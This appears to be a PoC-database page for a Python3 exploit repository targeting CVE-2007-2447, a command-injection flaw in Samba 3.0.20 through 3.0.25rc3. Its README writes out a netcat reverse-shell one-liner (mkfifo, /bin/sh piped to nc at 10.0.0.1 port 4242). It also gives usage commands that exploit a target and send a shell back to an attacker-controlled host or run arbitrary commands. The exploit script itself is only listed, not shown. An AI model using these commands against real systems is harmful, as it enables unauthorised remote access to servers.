CVE-2007-2447 PoC — Samba MS-RPC Shell命令注入漏洞

Source

Associated Vulnerability

Description

Exploit code for CVE-2007-2447 written in Python3.

Readme

# CVE-2007-2447 - Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution

## Introduction

This repository contains my exploit code for CVE-2007-2447 written in Python3. By default it sends a [Netcat OpenBSD reverse shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-openbsd) on port 443 to the target host, but you can also specify a custom command.

```bash
# Netcat OpenBSD reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
```

## Usage

```bash
# Exploit target 10.129.232.46 on port 445, send back reverse shell to 10.10.14.82 on port 443
python3 CVE-2007-2447.py --rhost 10.129.232.46 --lhost 10.10.14.82

# With custom rport and lport
python3 CVE-2007-2447.py --rhost 10.129.232.46 --rport 4445 --lhost 10.10.14.82 --lport 31337

# Execute custom command and set timeout for slow hosts
python3 CVE-2007-2447.py --rhost 10.129.232.46 -c "ping -c 3 10.10.14.82" -t 10
```

File Snapshot

 [4.0K]  /data/pocs/3b092cfccc75cf6778a6dc00ed0824dbf92fbfd2
├── [2.0K]  CVE-2007-2447.py
└── [1.0K]  README.md

0 directories, 2 files

Remarks